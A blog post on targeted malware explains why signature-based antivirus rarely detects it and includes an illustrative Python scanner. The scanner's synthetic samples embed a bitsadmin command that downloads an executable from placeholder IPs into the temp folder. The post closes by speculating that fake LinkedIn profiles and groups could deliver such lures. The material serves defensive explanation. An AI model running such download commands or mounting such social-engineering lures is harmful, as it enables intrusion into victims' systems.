Friday, January 15, 2010

Targeted Malware

Targeted Malware has featured prominently in security news this week. To summarize, Targeted Malware is just like other malware, but attempts to distribute it are limited to a small group of people or even a single person. Because the attacker has to invest effort in each individual victim, it is more likely to be used for espionage, political or industrial, than for direct crime. It can be particularly effective because the email, web site or document used to trick the user into installing the Malware can be tailored to a very narrow area of interest, lulling the user into a false sense of security.

The chances of Targeted Malware being detected by an antivirus package are also low. Antivirus software relies mainly on comparing code against a database of known malicious patterns (signatures). Anti-Malware vendors build their databases from Malware they have either “trapped” themselves, typically in honeypots, or that has been sent to them by their clients. A targeted attack would almost certainly miss the vendor honeypots, and because of its small distribution the chances of it being reported by an end user are slight, so it may never acquire a signature at all.
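To make the point above concrete, here is a toy signature scanner. It is an added example, not code from the original post or from any antivirus vendor. The two "executables" are constructed byte strings standing in for a widely distributed downloader the vendor has trapped and a targeted variant built with the same toolkit but pointed at a different server; the signature names and IP addresses are made up for illustration.

```python
"""Toy signature-based scanner showing why a targeted variant slips past a
database built only from samples the vendor has already seen.
Added example; the samples below are synthetic byte strings, not real malware."""
import hashlib
import re

# Constructed stand-in for a sample the vendor has "trapped" in a honeypot.
TRAPPED_SAMPLE = (
    b"MZ\x90\x00"
    + b"\x55\x8b\xec\x83\xec\x40"   # push ebp; mov ebp,esp; sub esp,0x40
    + b"cmd.exe /c bitsadmin /transfer j http://203.0.113.10/p.exe %TEMP%\\p.exe\x00"
)

# Constructed targeted variant: same toolkit and behaviour, but a different
# download server and an alternate (equivalent) encoding of "mov ebp,esp".
TARGETED_VARIANT = (
    b"MZ\x90\x00"
    + b"\x55\x89\xe5\x83\xec\x40"   # push ebp; mov ebp,esp; sub esp,0x40
    + b"cmd.exe /c bitsadmin /transfer j http://198.51.100.7/q.exe %TEMP%\\q.exe\x00"
)


def sha256(data):
    """Hex SHA-256 of a sample; the simplest possible 'known bad' signature."""
    return hashlib.sha256(data).hexdigest()


# Hypothetical vendor database. Every entry is derived from TRAPPED_SAMPLE,
# because that is the only sample the vendor has ever received.
VENDOR_DB = {
    "hashes": {sha256(TRAPPED_SAMPLE): "Trojan.Downloader.A"},
    "patterns": [
        # Byte pattern lifted from the trapped sample's function prologue.
        (re.compile(rb"\x55\x8b\xec\x83\xec\x40"), "Trojan.Downloader.A!prologue"),
        # The exact download URL seen in the trapped sample.
        (re.compile(rb"http://203\.0\.113\.10/p\.exe"), "Trojan.Downloader.A!url"),
    ],
}


def scan(sample, db):
    """Return the names of every signature in `db` that matches `sample`.

    Hash signatures are checked first, then byte-pattern signatures in the
    order the database lists them."""
    hits = []
    name = db["hashes"].get(sha256(sample))
    if name:
        hits.append(name)
    for pattern, name in db["patterns"]:
        if pattern.search(sample):
            hits.append(name)
    return hits


def add_signature(db, sample, name):
    """What happens once a client finally submits the sample: the vendor adds
    its hash to the database and it becomes detectable from then on."""
    db["hashes"][sha256(sample)] = name


if __name__ == "__main__":
    print("trapped sample:   ", scan(TRAPPED_SAMPLE, VENDOR_DB))
    print("targeted variant: ", scan(TARGETED_VARIANT, VENDOR_DB))
    add_signature(VENDOR_DB, TARGETED_VARIANT, "Trojan.Downloader.B")
    print("after submission: ", scan(TARGETED_VARIANT, VENDOR_DB))
```

The trapped sample lights up all three signatures; the targeted variant matches none of them, even though it does exactly the same thing, until somebody sends it to the vendor. A broader pattern on the shared `bitsadmin /transfer` string would catch both, but that is a heuristic rather than a signature and carries the false-positive risk that makes vendors cautious about shipping such rules.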

The Register has a good article about a recent targeted attack on Google. There is a video at the bottom of the article by F-Secure that gives further insight into Targeted Malware.

Whilst writing this blog entry, it sprang to mind that a good launch pad for this kind of attack would be a social network, in particular a business-oriented one such as LinkedIn. It’s easy enough to build a false profile, and it’s also simple to identify targets at, say, an organisation that you wanted to infiltrate. The Groups feature could be particularly useful, as you can post links to external websites and documents which could carry the Malware. As the end user has had to log in to the system and is probably looking at a Group that is fairly specific to their job role, the chances are that they have a false sense of security and are not as cautious as they usually would be.
